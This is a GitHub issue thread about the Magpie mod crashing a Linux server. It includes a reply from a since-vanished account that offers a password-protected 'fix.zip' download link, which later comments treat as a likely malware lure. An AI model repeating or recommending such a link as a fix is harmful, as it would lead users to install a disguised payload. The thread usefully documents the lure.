### ISSUE TITLE
Magpie causes server to crash on startup (linux)

### ISSUE THREAD

**Issue by LightningFerix** [xSpleet/Magpie#6]
[crash log](https://mclo.gs/iCPBJaZ)

Hi again!

If I had a nickel for every time Magpie worked on my client but crashed the server on startup, I'd have two nickels, which isn't a lot, but it's weird that it happened twice. This time it's a little bit different, though. I was running the server on Windows with clients on Windows (same configuration as when Magpie previously crashed the server). I moved everything over for the server to run on Linux instead, but for some reason once it got there, Magpie causes the server to crash on startup. My client (on Linux) still works perfectly fine though, just like before.

I'm assuming that whatever the cause is, it happened because I'm on Linux now, but unfortunately I can't not be on Linux because of other, irrelevant reasons :(

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LightningFerix** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

I want to make it clear that I really, really appreciate your super quick response to my issue. But please understand that I can't just blindly download a file and run it. What is this and what does it do?

**Comment by LightningFerix** [comment]
Hey! So I actually Googled the error and it turns out it's because I installed the "headless" version of the JRE instead of the full JDK. There were things in the JDK that Magpie needs to run, I guess. 

Thank you for all your hard work! Farewell for now, I hope we never have to meet again HAHAHA (unless you release a new fantastic mod like Magpie :))

**Comment by xSpleet** [comment]
> > Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> I want to make it clear that I really, really appreciate your super quick response to my issue. But please understand that I can't just blindly download a file and run it. What is this and what does it do?

Hi, I am glad that you found the solution to the problem.
I was just wondering, who sent you this link? Was it from my account? Because I can't find this comment anymore.

**Comment by LightningFerix** [comment]
Hey! No, it was from an account named "bkballoon." After they sent the link, I did download the link (in a VM) but I never opened the zip file and I forgot about it so it's long gone now. 

I looked at their profile soon after they sent the link, and it looked like a regular, real GitHub account. I just searched it now and it has seemingly vanished. My theory is that their account got hacked and was used to spread malware? And then the account was terminated by the hacker after they were done or the original user to try to stop the hacker. It's a shame they lost their account. 

They responded SUPER quickly, too, so it was very suspicious all around.

**Comment by LightningFerix** [comment]
![image](https://github.com/user-attachments/assets/d708cd5a-2031-4595-96ae-48c9821a6b0c)

I apologize for the bad quality photo, I should have taken a screenshot, but here is the exact message and user. If you Google this username, you can clearly see that it once existed, but every link leads to the GitHub 404 page.

**Comment by xSpleet** [comment]
I am glad you didn't run that file! I was scared for a moment I sent that link and that my GitHub was hacked, glad it wasn't the case...
